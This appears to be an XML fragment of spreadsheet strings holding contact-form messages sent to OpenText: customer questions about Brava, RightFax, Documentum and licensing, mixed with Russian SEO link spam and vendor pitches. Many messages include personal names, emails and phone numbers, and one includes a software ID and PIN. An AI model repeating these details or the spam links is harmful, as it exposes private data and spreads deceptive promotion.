    <t>Первое в России инвалидное электрокресло, управляемое силой мысли, прошло испытания в Москве, сообщает «Российская газета». Главная составляющая — нейрогарнитура (эластичная шапка с электродами). Читайте об этом подробнее на сайте [url=http://tvoi-noski.ru]tvoi-noski.ru[/url]</t>
  </si>
  <si>
    <t>Стресс для женщины – далеко не редкое явление в сегодняшнее неспокойное время. И стресс – большая проблема, с которой, несомненно, нужно и важно бороться, и как быстрее вы это сделаете – тем лучше будет вам и вы сможете вернуться от грустных чувств к жизнерадостному образу жизни, подробнее читайте на сайте [url=http://dettka.com]dettka.com[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Please can you provide me a Demo of OpenText Document Management capabilities?_x000D_
</t>
  </si>
  <si>
    <t>Стань успешным трейдером https://clck.ru/CZKnE _x000D_
 _x000D_
https://vk.cc/7BDB5s _x000D_
 _x000D_
Тургуйте биткоином тут https://clck.ru/CZKpJ _x000D_
 _x000D_
https://vk.cc/7t8bFt _x000D_
 _x000D_
Подробности на сайте http://zarabotok--doma.ru _x000D_
 _x000D_
http://dor1.aiq.ru _x000D_
http://dor2.aiq.ru _x000D_
http://dor3.tora.ru _x000D_
http://dorend1.aiq.ru</t>
  </si>
  <si>
    <t>New Licence Server has new Licence Manager and Service installed - many desktops still have their licence set to the old licence Server - how can I update all the desktops to use the New lIcence Server. Thank You.</t>
  </si>
  <si>
    <t xml:space="preserve"> скамьядляпресса-Доскаобъявлений от частных   Скамьидляпресса, спины (гиперэкстензия), силовые. 1 840 руб. А так же со штангами и грифами любых диаметров, изогнутых и  стенках и силовых стойках. А так же турники и брусья в ассортимменте.  /rossiya?q=скамья+для+пресса &lt;br&gt; &lt;strong&gt;Шведскаястенкадлядетейв квартиру - купить  &lt;/strong&gt;.&lt;br&gt;  _x000D_
 [URL=http://shved-stenki.ru/shvedskaya-stenka-romana-kometa-5/]Шведская стенка романа комета 5[/URL] [URL=http://shved-stenki.ru/detskij-sportivnyj-kompleks-vertikal-veselyj-malysh-kupit-v-samare/]Детский спортивный комплекс вертикаль веселый малыш купить в самаре[/URL]  _x000D_
 Как называетсяпоанглийскидомашняя "шведская стенка"?  Просмотр полной версии : Как называетсяпоанглийскидомашняя "шведская стенка"? горизонтальнаяшведскаястенка. А Юля спрашивает как манки бар по-русски называется. Никак не могу приличного перевода приудмать.   &lt;br&gt; &lt;h4&gt;Комплекс упаржнений для домашнейшведскойстенки. -  &lt;/h4&gt;.&lt;br&gt;  _x000D_
скамейки гимнастические деревянные _x000D_
 _x000D_
 Шведские стенки комплексы  Каталог товаров  Фитнес Для здоровья Эвапндеры Зимний спорт и отдых Отдых и пляж Детям Игры настольные Турники и брусья Гантели, гири, штанги Мячи Йога и пилатес  280х95смстурником - Артикул DSK-007.  р. В  1 клик.  /katalog/shvedskie-stenki-kompleksy &lt;br&gt; Деревянныешведскиестенкикупитьв Москве в RussSport  Шведская стенка деревянная из бука для дома и квартиры отлично впишется в любой интерьер детской или любой другой комнаты! Купиь. Добавить к сравнению &gt;. Шведская стенка из дуба с древянным турником.   &lt;br&gt;  _x000D_
  [URL=http://shved-stenki.ru/shvedskaya-stenka-doneck-rossiya/]Шведская стенка донецк россия[/URL] [URL=http://shved-stenki.ru/shvedskaya-stenka-derevyannaya-dsb-bp45/]Шведская стенка деревянная дсб бп45[/URL]  _x000D_
 Что такое шведская стенка - Как выжить в Москве  И практически все используют для этогошведскиестенки, поскольку именно они сочетают в себе комплекс раазных спортивных снаряжений для занятий ребеека.  /chto-takoe-shvedskaya-stenka &lt;br&gt; Шведская</t>
  </si>
  <si>
    <t>Is Brava Desktop compatible with Windows 10 os?</t>
  </si>
  <si>
    <t>Request OpenText Support</t>
  </si>
  <si>
    <t>I want to block content on my mobile phone</t>
  </si>
  <si>
    <t>I'd like to register correctly to log a software defect impacting this client. I was registered under ECM and has several tickets and I cant seem to do the same with this site. Please assist</t>
  </si>
  <si>
    <t>we are seeking for a new eDocs system implementation for new business unit under our group, i am seeking your support in term of license and support._x000D_
_x000D_
kindly advice.</t>
  </si>
  <si>
    <t>HI,_x000D_
Can you please let me know whether you have a trial or evaluation version of content server. I would like if you have a trial for content server version 10 as well._x000D_
Regards,_x000D_
Geeshan.</t>
  </si>
  <si>
    <t xml:space="preserve">can you provide me the opentext ECM implementing information ? _x000D_
I would likely to know :_x000D_
how long the project will be ? apply what implement methodology ? _x000D_
and if we want to integrated with SAP procurement, then how long the project will be ?_x000D_
This is an initial survey and can you send me some materials for study. many thanks ~ </t>
  </si>
  <si>
    <t>О том, что зубы нужно чистить дважды в день, минимум 2–3 минуты, знает каждый. Но придерживаются этого правила только 50% людей. Более того, исследования шведских ученых показали, что чистит зубы по всем правилам, рекомендованным стоматологами, только один человек из десяти, подробнее читайте на сайте [url=http://nalatty.com]nalatty.com[/url]</t>
  </si>
  <si>
    <t>Hello There, can I please have a quote for a fax server for 20 ports and 1 year of maintenance?_x000D_
we are trying to migrate this customer from a CSE 1 K to Cisco UC.</t>
  </si>
  <si>
    <t>Intrigued by Magellan &amp; saw ad in Jan/Feb 2018 issue of HBR._x000D_
I've developed a simple way to store, retrieve &amp; display information. It can be downloaded in a ready to use form so that users can take information from PC to shopfloor where the value is created. During the development I realised that we could use the same platform across all industries. I'd like to discuss with someone from Opentext if possible. I'm prepared to fly over to Canada if needed. JAG</t>
  </si>
  <si>
    <t>Вопрос о том, когда отношения можно считать по-настоящему счастливыми, давно волнует исследователей, причем каждый старается развить собственную теорию, пишет Die Welt (перевод на Inopressa.ru), подробнее об этом читайте на сайте [url=http://xozyaika.com]xozyaika.com[/url]</t>
  </si>
  <si>
    <t>Планировка улучшенная и предусматривает гардеробную, грузовой лифт, санузел в кафеле, балкон с ремонтом [url=http://xn----7sbapuca4antzdr4f1a.xn--p1ai]жк афродита 2 официальный[/url] афродита мытищи официальный. К вашим услугам все варианты рассрочки платежа, покупка в ипотеку, а также наши акции и скидки для особо счастливых покупателей</t>
  </si>
  <si>
    <t>[url=http://gtalogo.com/]гта емблемы[/url] _x000D_
[url=http://gtalogo.com/orders.html]гта емблемы[/url] _x000D_
[url=http://gtalogo.com/faq.html]гта емблемы[/url] _x000D_
[url=http://gtalogo.com/top.html]гта емблемы[/url] _x000D_
[url=http://gtalogo.com/emblem-8447.html]гта емблемы[/url] _x000D_
[url=http://gtalogo.com/emblem-8525.html]гта емблемы[/url] _x000D_
[url=http://gtalogo.com/emblem-8521.html]гта емблемы[/url] _x000D_
[url=http://gtalogo.com/emblem-8505.html]гта емблемы[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">PayPal is issuing an RFP for Document Management - we would like to include your organization. </t>
  </si>
  <si>
    <t>Hello!_x000D_
_x000D_
The OpenText Document Management(DM) system is running really slow. Seems like some sort of process is running and causing issues. When end users try to run a profile search, the search time goes from seconds to minutes if it responds at all._x000D_
We tried to stop and then start the service, but that did not affect anything. We started clearing cache but it showed us the error "Another program is in use"._x000D_
_x000D_
Please guide us to resolve this issue asap.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
This is John from Commvault System, we plan to have redaction functionality in our product. So I just want to learn if you provide Python interface for redaction in your product, and if you can provide independent Python library or package for that?_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>A few members of our firm would like to find out more about eRooms, which I believe is no Documentum or OpenText and eRoom.net. We are in need of a legal management document repository and archival system to manage our Intellectual Property Law filed cases. Please contact me to find out more and to set up a Webinar for the purposes of our team finding out more about your products. _x000D_
Thanks_x000D_
Stephanie Hughes</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I would like information on creating an e-catalog/ UPC catalog. We are starting to do business with Nordstrom.com and want to have an e-catalog for them to access our product information._x000D_
_x000D_
Thank you,_x000D_
Allan </t>
  </si>
  <si>
    <t xml:space="preserve">Checking on pricing for fax software.  Installing a VoIP system and want to replace 15 fax machines.  Replying to the email address given, is a quicker method then calling.  </t>
  </si>
  <si>
    <t>Good morning.  I own a CXL version Brava Desktop license, license that I have.  My computer crashed, and  I bought a new one, but now, when I install Brava's software, it shows an instruction which indicates that my license is already used.  What should I do to get this software reinstalled.</t>
  </si>
  <si>
    <t xml:space="preserve">I cannot log into GSX, need to update info and verify you have the correct contact information </t>
  </si>
  <si>
    <t xml:space="preserve">We have a support from Merrill Lynch or bank of America. Our colleague Girish_Boregowda@ml.com </t>
  </si>
  <si>
    <t xml:space="preserve">We are going to configure SharePoint Online to be our EDMS.  I understand at this time Brava does not have a tool integrated with SharePoint Online.  _x000D_
Is SharePoint Online integration on your road map, or is there a way to integrate?_x000D_
</t>
  </si>
  <si>
    <t>Ron, Please give me a call around 1:00 PM our time.  Thanks</t>
  </si>
  <si>
    <t>Inquiring about invoice capture software.  I'll be in our Houston office next week along with representatives from Canada and wanted to see if there was someone there that could provide a short demo in person or a web session.  Thank you.</t>
  </si>
  <si>
    <t>Is OpenText TeamSite a PAAS or SAAS service.  There is a BIG difference between the two and the sales people I have talked to don't provide me the confidence they know what they are talking about.  I am interested IF I CAN GET MY QUESTION ANSWERED TODAY.  My phone number is 630.721.8861 - best way to get ahold of me._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>While working for the California State Controller's Office, I used Metastorm extensively for mapping business processes.  Do you still offer that product?  What are the procedures for obtaining it._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
I came to know that HP sold the HP Output Management software to OpenText in 2016._x000D_
1. I want to know what is the latest version of Dazel server? we are on HP Output Server: 4.1.0 Service Pack: 13.1_x000D_
_x000D_
2. Do you support this software? If yes from where can I download the latest software and upgrade document._x000D_
_x000D_
Regards,_x000D_
Pravin_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for ways to transfer documents from Salesforce to OpenText </t>
  </si>
  <si>
    <t xml:space="preserve">We are needing to order Brava, but wondering if you do NET30 </t>
  </si>
  <si>
    <t>To Whom It May Concern, _x000D_
_x000D_
We are looking at implementing new software to assist in our Project Management at Mammoet. Primarily and immediately we are interested in implementing a more functional document management system, with the ability to expand into more PM related software functions over time. Currently we are on SAP-ERP so having a system which is able to communicate with SAP would be ideal. _x000D_
_x000D_
If you could provide me with more information about what types of PM software related solutions OpenText can offer us, I would appreciate it. _x000D_
_x000D_
Thank you,_x000D_
_x000D_
Sigrid Ziegler_x000D_
Project Manager_x000D_
Mammoet</t>
  </si>
  <si>
    <t xml:space="preserve">Existing Captiva capture software no longer supported. Looking for information on upgrade solutions. </t>
  </si>
  <si>
    <t xml:space="preserve">Svenska kraftnät planerar att förbättra sin dokumenthanteringsprocess med ett systemstöd. Som ett första steg för att få bättre kunskap om vad marknaden har att erbjuda har Svenska kraftnät publicerat en RFI på www.e-avrop.com för att samla information och kunskap om potentiella leverantörer och möjliga lösningar som möter vårt behov av stöd för dokumenthantering. Utifrån inkomna svar bjuder Svenska kraftnät in till leverantörsmöten för fördjupad diskussion, demonstration och test av lösningsförslagen. Därefter planeras en eventuell upphandling av lämpligt systemstöd som implementeras under 2018-2019._x000D_
_x000D_
Eftersom vi är intresserade av att få svar från er om OpenText Content Server och Documentum platform vill jag tipsa er om RFI:n. Här är länk till RFI:n:_x000D_
https://www.e-avrop.com/svk/e-Upphandling/Rfi.aspx?id=722_x000D_
</t>
  </si>
  <si>
    <t>hi, _x000D_
we have received a tender from a company regarding CCM implementation, and we would like to explore the opportunity, whether we could jointly offer. _x000D_
We need an immediate contact, since next Monday (29th) we need to submit offer._x000D_
Thanx &amp; br, _x000D_
Dimitrios Alexandris.</t>
  </si>
  <si>
    <t xml:space="preserve">    My name is Luke Zanev and I am representative of R&amp;D Solutions. I would like to shortly present our services to you._x000D_
    R&amp;D Solutions offers complete IT cloud services on top of AWS – consultancy, architecture analysis &amp; design, development, implementation, deployment, support and maintenance. Our services include digital cloud transformation and mobile solutions on top of AWS infrastructure; consultations for the implementation of DevOps and Agile software development methodologies and project management, cloud services, based on Amazon Web Services (AWS)._x000D_
    We also offer opportunities for near-shore software development team based in Bulgaria. The country is ideal for development outsourcing because of its proximity to the UK and western Europe._x000D_
    If you can spare a few minutes, I would like to schedule an appointment with you at a suitable time, so I can give you a full grasp of the breath of our process. You can reach mе by email: lzanev@rnd-solutions.net or phone: +359 43422 25_x000D_
_x000D_
Thank you for your time,_x000D_
_x000D_
Luke Zanev_x000D_
Representative_x000D_
T: +359 43422 25_x000D_
E: lzanev@rnd-solutions.net_x000D_
W: rnd-solutions.net_x000D_
</t>
  </si>
  <si>
    <t>I would like to speak with someone on the sponsoring / speaking side of the company for the Smart Energy Conference in Halifax, April 24/25. Thanks</t>
  </si>
  <si>
    <t>Привет! прикольный у вас сайт! _x000D_
Нашел интересную базу кино:  [url=http://kinoserialtv.net/]Смотреть онлайн лучшие аниме[/url] _x000D_
Здесь: http://kinoserialtv.net/news/11564-sozdateli-polnogo-raskolbasa-razygrali-pokupateley-v-supermarkete.html [b] Создатели "Полного расколбаса" разыграли покупателей в супермаркете [/b] _x000D_
Тут: http://kinoserialtv.net/news/10941-dzhared-leto-vstretilsya-s-realnymi-psihopatami-radi-roli-dzhokera.html _x000D_
http://kinoserialtv.net/fentezi/ [b] смотреть фильмы 2015 фэнтези [/b] _x000D_
[url=http://kinoserialtv.net/serialy/] Новинки в хорошем качестве hd лучшие сериалы [/url] _x000D_
[url=http://kinoserialtv.net/fentezi/] фильмы фэнтези 2016 [/url] фильмы фэнтези 2016</t>
  </si>
  <si>
    <t>I am trying to get Brava Reader free but the email with the link never comes in. Can you email me the link for installing Brava Reader Free?</t>
  </si>
  <si>
    <t>Привет всем! класный у вас сайт! _x000D_
Нашел интересную базу кино: [url=http://kinofly.net/]Онлайн лучшие семейные фильмы[/url] _x000D_
Здесь: http://kinofly.net/fentezi/12326-dom-strannyh-detey-miss-peregrin-miss-peregrines-home-for-peculiar-children-hd-2016.html [b] Смотреть Дом странных детей Мисс Перегрин / Miss Peregrine's Home for Peculiar Children HD (2016) онлайн бесплатно [/b] _x000D_
Тут: http://kinofly.net/news/2352-vyshlo-pervoe-video-k-rezhisserskomu-debyutu-rassela-krou.html _x000D_
Тут: http://kinofly.net/uzhasy/ [b] 2017 список лучшие ужасы [/b] _x000D_
Тут: [url=http://kinofly.net/fantastika/] Лучшие фантастика 2017 онлайн [/url] _x000D_
Здесь: [url=http://kinofly.net/istoricheskiy/] В хорошем качестве лучшие исторические фильмы [/url] В хорошем качестве лучшие исторические фильмы</t>
  </si>
  <si>
    <t xml:space="preserve">I am from ITC Infotech, Bangalore, India office. We have a requirement where we would like to get our consultants trained on Open Text Enterprise Information Management. _x000D_
I would like to know training course detail that covers Open Text  EIM/ECM. Can it be organized at our office?_x000D_
_x000D_
Please revert back with information like training course Duration, Cost, any Pre-requisites etc._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RFP for a major company in Tunisia_x000D_
_x000D_
Hello Sir/Madam,_x000D_
_x000D_
Greetings from Vaizone!_x000D_
_x000D_
We are a systems integrator and a Management consulting company with offices in Tunis, Tunisia. For an RFP from a major company in Tunisia, we are processing right now, we contact you today. We would like to inquire about your interest in a joint bid you Sparx systems along with Vaizone. Vaizone was founded in 2013, coupled to our expertise and understaing of this region we operate in, we have earned during our 5 years of activity the know-how and the expertise in the conduct of end-to-end IT projects, we know how to bring projects to the end-line successfully. Today, we aim to have you as a partner in this bid and others that will come we are sure._x000D_
_x000D_
We look forward to have further discussions with you and to bring this inquiry to fruition. Your prompt reponse will be most appreciated._x000D_
_x000D_
Best Regards._x000D_
_x000D_
Mahdi Cherif._x000D_
Business Development Manager._x000D_
Vaizone Solutions._x000D_
Don't Reinvent the Wheel, Make it Faster!_x000D_
Tél: +216 97 88 39 28/+216 55 585 894_x000D_
Landline: +216 71 607 380_x000D_
Telecopie/Fax: +216 71 660 122_x000D_
cherif.mahdi@vaizones.com_x000D_
www.vaizones.com_x000D_
</t>
  </si>
  <si>
    <t>初めてご連絡させていただきます。 株式会社NALのニアと申します。 弊社は東京、ベトナム・ハノイ、ダナンにある IT会社です。 ( www.nal.vn ). 2013年に設立し、現在150人の規模で 常駐開発、ニアショア開発、オフショアのサービスを提供しております。 システム開発の人材確保やコスト削減、 またはAI関連の研究開発・プロトタイプ作成、 ニーズありましたら是非ご連絡ください。 【システム開発】 Web系システム開発、Android・iPhoneアプリ開発を得意としています。 - WEBでは電子カルテシステム、 POS・メール配信システム、ECサイトなど - モバイルではVOIPシステム、SNS、店舗向けアプリ、ゲームなど 多数の開発案件を成功させ、多くの日本企業様から信頼をいただいております。 【AI研究開発】 Watson, Tensorflowと言った既存サービス、プラットフォームを使用した開発から、 独自のエンジン開発も行なっています。 - NLP ： 文献重複チェックシステム - 画像認識 ：手書き文字認識、顔認識、Emotion認識 経営陣は15年間日本IT業界の経験を持ち、 技術力はもちろん業務理解力、ソリューション提案力も自信があります。 是非ご連絡ください。 お忙しいところ恐縮ですが、一度ご提案の機会を頂ければと思います。</t>
  </si>
  <si>
    <t>I am not b able to create support tickets anymore. Please solve this ASAP I need to create a license request ticket.._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hello,_x000D_
we need the OpenTextConnectivity14x64_ServicePack13.exe as MSP File. Could you send me a downloadlink for it?_x000D_
Thanks!_x000D_
BR_x000D_
Christiane</t>
  </si>
  <si>
    <t xml:space="preserve">I cannot activate the Brava Reader I bought recently. I will copy in the Licensing email. The page http://support.opentext.com does not have any link corresponding to this: "Click on Accounts on the Top Menu" . And I cannot find any way of activing on any other page._x000D_
I have several times attempted to establish an account, using two different email addresses: john.kilcullen@mq.edu.au and johnkilcullen756@gmail.com. With the second address I seem to have succeeded: please use that address. Since failing to activate the software I paid for I have downloaded a trial version, but it will run out soon._x000D_
John Kilcullen_x000D_
_x000D_
Dear Rupert Kilcullen,_x000D_
_x000D_
Having trouble downloading?_x000D_
If you are having trouble downloading our software, please let us know by opening a support ticket on My Support &lt;http://support.opentext.com&gt;. If you are not able to sign into My Support please contact your nearest support office &lt;http://www.opentext.com/2/global/company/company-contact.html&gt;._x000D_
_x000D_
Order related questions._x000D_
For order, pricing or invoice related questions, please send an email to IGC_Sales@opentext.com_x000D_
_x000D_
Thank you for your business. Please read this entire email to obtain your Brava! Desktop TX 16.3 software._x000D_
Product Description: Brava! Desktop TX_x000D_
Product Version: 16.3_x000D_
_x000D_
Software ID: 685AD19BA4134662BF07FBBBDECBCB82_x000D_
Software PIN: IGC459836_x000D_
_x000D_
Prerequisite: Previous versions of the purchased product must be uninstalled prior to installing your purchased version._x000D_
_x000D_
    Obtain your license key_x000D_
        Please visit: http://support.opentext.com and follow the below steps:_x000D_
            Click on Accounts on the Top Menu_x000D_
            Select Activations/Keys_x000D_
            On the Product Activation Page Search for your IGC PIN_x000D_
            Click on the Produce License Key icon_x000D_
            Enter Required information to generate Key_x000D_
            Click Submit_x000D_
            Click Download File to obtain your License File_x000D_
            Open zip file and save IGCKey.lic to a retrievable location </t>
  </si>
  <si>
    <t>One of our clients wants to send us medical charts to code and wants to send them to us from their EHR or via fax. We don't have efax and need some type of fax services. You were recommended to us by our client. Can someone please contact me and let me know what the cost is and how we can get set up with your fax services? Thank you.</t>
  </si>
  <si>
    <t>Hello_x000D_
I've a client who wants to buy Brava which can do measurement for pdf and dwg file. May I know which software should I propose? May I know is there any reseller program?_x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Would you be able to please provide me with some pricing (user licences, subscriptions) information on BRAVA?</t>
  </si>
  <si>
    <t>Mirion uses Actuate Software, but we don't have a point of contact (or account manager) in our files.  Can you please call or email me, to provide that contact name?  Thank you, Adrian Wolff</t>
  </si>
  <si>
    <t>What do you need from me to be able to access knowledge base ?_x000D_
_x000D_
https://knowledge.opentext.com/knowledge/llisapi.dll/open/16514436_x000D_
_x000D_
Thank you,_x000D_
Teo</t>
  </si>
  <si>
    <t xml:space="preserve">Network Aliases not working,   A while ago, when I reported this same problem, I was given a little tool that applied the network aliases.  in the course of time. I have lost it and any copy of it.  I would like someone to contact me, or send me the file to download agan_x000D_
_x000D_
thanks_x000D_
_x000D_
Robert_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Не удивительно, что женихи с периферии тоже желают выглядеть модно и красиво, как и столичные. Поскольку в центральную Россию поступают товары из-за рубежа по прямым анналам, то поставки в центре существенно определяют моду и направление стилистики ассортимента для всей страны, подробнее читайте на сайте [url=http://dom-lady.ru]dom-lady.ru[/url]</t>
  </si>
  <si>
    <t>We're a small law firm and are looking at document management programs.</t>
  </si>
  <si>
    <t>We currently have am Alchemy server setup ( customer ID 10022953 ) however we will soon need to upgrade the server O/S and set up a backup server as well for DR purposes</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
We are currently using RightFax version 10.5 and would like to upgrade to RightFax version 16.2. Please submit a quote for the software upgrade and also for one (1) year of software support._x000D_
_x000D_
Thank you,_x000D_
Elsa Murillo, Purchasing Specialist_x000D_
Crystal Stairs, Inc._x000D_
5110 W. Goldleaf Circle, Suite 150_x000D_
Los Angeles, CA 90056_x000D_
TEL: 323.421.1353_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am looking for pricing to see if opentext is a viable option for us.</t>
  </si>
  <si>
    <t>expansion of on premise RightFax installation</t>
  </si>
  <si>
    <t>Would like to speak to someone in the Enterprise Content Management group.  We are looking for a web browser application for our drawing management services.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in obtaining email database of Customer Engagement Software Users?_x000D_
_x000D_
This list Contains Company name, Web address, Contact name, Phone number, Email address, Title, physical address, City, State, Zip Code, Country, Phone number, Fax Number, Employee size._x000D_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</si>
  <si>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We have RightFax implemented in our environment and I need to understand the licensing model because I cannot figure out who at PACCAR purchased the product in order to get this information myself.</t>
  </si>
  <si>
    <t>I'm working towards migrating my users to Redact-It 16.2 from 2.3. _x000D_
The issue is going to be that redactions or markups don't seem compatible from version to version._x000D_
_x000D_
Is there a utility that can upgrade all the old work (we are talking thousands of pages per project and sometimes high numbers of projects) to the new version?_x000D_
_x000D_
IE I redact a document in 2.3_x000D_
I come back with 16.2 and it doesn't recognize the redactions so we wouldn't be able to even get back into our older work. Is there a utility that would convert that document so the new version can read it as if it had been redacted with 16.2?</t>
  </si>
  <si>
    <t>Hello, never received an email that contains info. for the free latest Brava Reader download.</t>
  </si>
  <si>
    <t>Would like to see if RightFax can be integrated into our environment to displace fax machines in our 10 plus remote offices.</t>
  </si>
  <si>
    <t>Dear Sir/Madam, _x000D_
I work for Mandaraka Creative Studio, we are animation specialists and we already develop education projects for LMS, specifically for the LMS Knotion (knotion.com). We work across different phases of the creative process, from story and character creation, to script, audio production and all the necessary animation work for a project like this. I would like to ask what is e-mail contact of the person, or area, to whom I can send our portfolio, including the more than 200 animation minutes that we have been working on for this interesting Project. I want to thank you in advance for your assistance in this matter. Kind regards.</t>
  </si>
  <si>
    <t xml:space="preserve">We’re a personal lines insurance carrier looking to startup a CCM program. We are finalizing our POC requirement document and hope to have this available by end of business tomorrow, which will go into detail as to what we’re looking for in a CCM solution. We’re looking for a CCM solution which can migrate our legacy business output system to high-volume processing and legacy manual claims process to an interactive workflow. Also, we would like to know your cloud offering and infrastructure requirements for on-premises solution. </t>
  </si>
  <si>
    <t>Needing a price on a rightfax solution for a customer</t>
  </si>
  <si>
    <t xml:space="preserve">One of our users is complaining about a "Contrast" box that appears when trying to send a fax._x000D_
_x000D_
This only appears on her end and not for most users.  I have a screenshot of what it looks like but I am not able to attach in this message._x000D_
_x000D_
Are we able to disable this feature?  She needs it to be disabled because she is unable to see the full document title and therefore it leaves room for error to send the incorrect fax to providers (hospitals, clinics etc.)_x000D_
_x000D_
Please advise._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to inquire about managing electronic and physical records related to a client matter. </t>
  </si>
  <si>
    <t>Hello _x000D_
We are reviewing adding an on premise RF solution.  However, I am now considering your managed services fax solution.  I would like to know more about this solution as well as cost comparison to on premise.  My direct number is 602-291-9957</t>
  </si>
  <si>
    <t>Sales support for an on premise RightFax solution for one of my customers.</t>
  </si>
  <si>
    <t>I'm not receiving the email with the download link for Brava! Reader.</t>
  </si>
  <si>
    <t>Trying to look at the Knowledge base for File 360. I keep getting looped back to the login page.</t>
  </si>
  <si>
    <t>Could you please confirm whether Actuate Ereports designer 11sp2  need any firewall exception as we need to onboard the application into our firm. If yes, we need to know the destination address and port number.Thanks in advance.</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Dans le cadre de notre migration SAP DB HANA, nous avons besoin du client HP Output Server Version 4.1 SP7 for AIX 7.2 TL1_x000D_
_x000D_
Best Regards / Cordialement,_x000D_
Houcine OUHBI_x000D_
IS - SIGMA_x000D_
+33 01 46 25 48 06_x000D_
+33 06 84 89 85 77_x000D_
houcine.ouhbi@saint-gobain.com_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I need to obtain a quote for 2 copies of Brava</t>
  </si>
  <si>
    <t>I plan on purchasing Brava Desktop, but in order to do that I will need a W-9 for the procurement process. Can you please provide me with this form?</t>
  </si>
  <si>
    <t>Do you offer summer internships in you Lincroft, NJ location?  Thanks.</t>
  </si>
  <si>
    <t>I'm working through a Bill of Materials and the following P/N: S-EXMP1550101M, was listed.  It has a description that reads "Exceed".  Could you please provide me information on this P/N including pricing and quantity breaks (if applicable)._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Chris Bravar</t>
  </si>
  <si>
    <t>Ich nutze gelegentlich Ihren BravaReader. Ich habe ihn jetzt noch mal installieren können, mit dem Hinweis demnächst Brava Desktop TX zu nutzen. Da ich keinen Download- link finde, bitte ich um eine Information, wo ich die Software laden kann. Danke für Ihr Bemühen!_x000D_
MfG</t>
  </si>
  <si>
    <t>Does Opentext accept any sort of language changes on the End User License Agreement, and if so, is a Word document of the EULA available?</t>
  </si>
  <si>
    <t>Clarification of the below message regarding the free version of Brava Reader. can you please explain which image formats will no longer be supported?_x000D_
_x000D_
Note: Please be aware that support for PDF and image formats will be discontinued in the next release of Brava! Reader. However, you can purchase Brava! Desktop for more formats and functionality without expiration.</t>
  </si>
  <si>
    <t>Привет всем участникам! прикольный у вас сайт! _x000D_
Нашел интересную базу кино: [b] Лучшие мелодрамы 2017 смотреть [/b] [url=http://kinofly.net/]http://kinofly.net/[/url] _x000D_
Здесь: http://kinofly.net/news/8228-obzor-boks-ofisa-ssha-2225-maya.html [b] Обзор бокс-офиса США (22—25 мая) [/b] _x000D_
Здесь: http://kinofly.net/multfilmy/ _x000D_
Тут: http://kinofly.net/fantastika/ [b] Лучшая фантастика новинки в хорошем качестве hd [/b] _x000D_
Тут: [url=http://kinofly.net/fantastika/] Лучшие фантастика 2017 в хорошем качестве hd 720 [/url] _x000D_
Тут: [url=http://kinofly.net/multfilmy/] Лучшие мультфильмы 2017 список [/url] Лучшие мультфильмы 2017 список</t>
  </si>
  <si>
    <t>I'm looking to see if you have a datasheet or a spec sheet on what your ECM solution has to offer.   We are looking at possible solutions._x000D_
_x000D_
Thank you for your time._x000D_
Raynae Sicotte</t>
  </si>
  <si>
    <t>I read about you and your competitors, you all are very impressive. I have an idea &amp; I like to run past you. Let us schedule a call for a 10min for an introduction._x000D_
Please point me in a right direction._x000D_
Our Clients say that the swings and roundabouts of Salesforce implementation, tailored customization, and global support ends here at Hytechpro. _x000D_
We are Salesforce partners for 5 years; we have MVP, Salesforce admins &amp; Pardot admins, over 40 developers working 24X7. We resolve unique Salesforce issues “except it is not what your local vendor provides or your in-house team does”.</t>
  </si>
  <si>
    <t>I have requested a 15 day trial for Brava and I am having difficulty installing and running the program.  I need assistance immediately since I need to use the Brava program this morning. Thank you, Ira Hymoff</t>
  </si>
  <si>
    <t xml:space="preserve">Hello I am wondering if you know of a solution for getting Documentum IFrame to work in Chrome.  Are there any prebuilt extensions that will allow the applet to run, or some other solutions.  If Iframe is the wrong term then maybe its considered a widget._x000D_
_x000D_
please let me know. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
We are interested in files, Folder documents management system, on top of that if it can facilitate with the email archiving it will be good option._x000D_
We are based in Jeddah City, KSA, following is my contact number._x000D_
+966 500314560_x000D_
_x000D_
Regards,_x000D_
</t>
  </si>
  <si>
    <t>Dear Ladies and Gentleman,_x000D_
_x000D_
please grant access for my account markus.horn@phorn.de for your online Support center._x000D_
_x000D_
Thank you in advance._x000D_
Best regards_x000D_
Markus Horn</t>
  </si>
  <si>
    <t>To understand Opentext product and services related to CMS optimisation for CIMB-Principal regional websites.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr gehrte Damen und Herren,_x000D_
_x000D_
wir haben Exceed onDemand im Einsatz und nutzen als Client nur iPad's. Leider funktioniert der EoD Client unter iOS 11 nicht mehr._x000D_
Wann werden sie den EoD Client aktualisieren bzw. gibt es eventuell einen neuen Client für iOS 11?_x000D_
Mit freundlichen Grüßen_x000D_
Dirk Sondermann </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I would just like to get your recommendation if we need to upgrade or patch our currently EDMS application._x000D_
Below are the details:_x000D_
Content Server 10.5 Update 2015-03 (version 10.5.0.1641) _x000D_
_x000D_
Thank you in advance.</t>
  </si>
  <si>
    <t>I am unable to open First Class Go app on Microsoft Surface device. I am using the android server address otsw.dsbn.org. I have also tried the PC server fc.dsbn.edu.on.ca but neither seem to work. please advise</t>
  </si>
  <si>
    <t>We have our Partner looking for Stream serve keys would like to know the procedure.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team, _x000D_
_x000D_
I have a technical query on Documentum. _x000D_
_x000D_
We are using Documentum  version 6.5 SP1, SQL 2005 SP4, Window server 2003. _x000D_
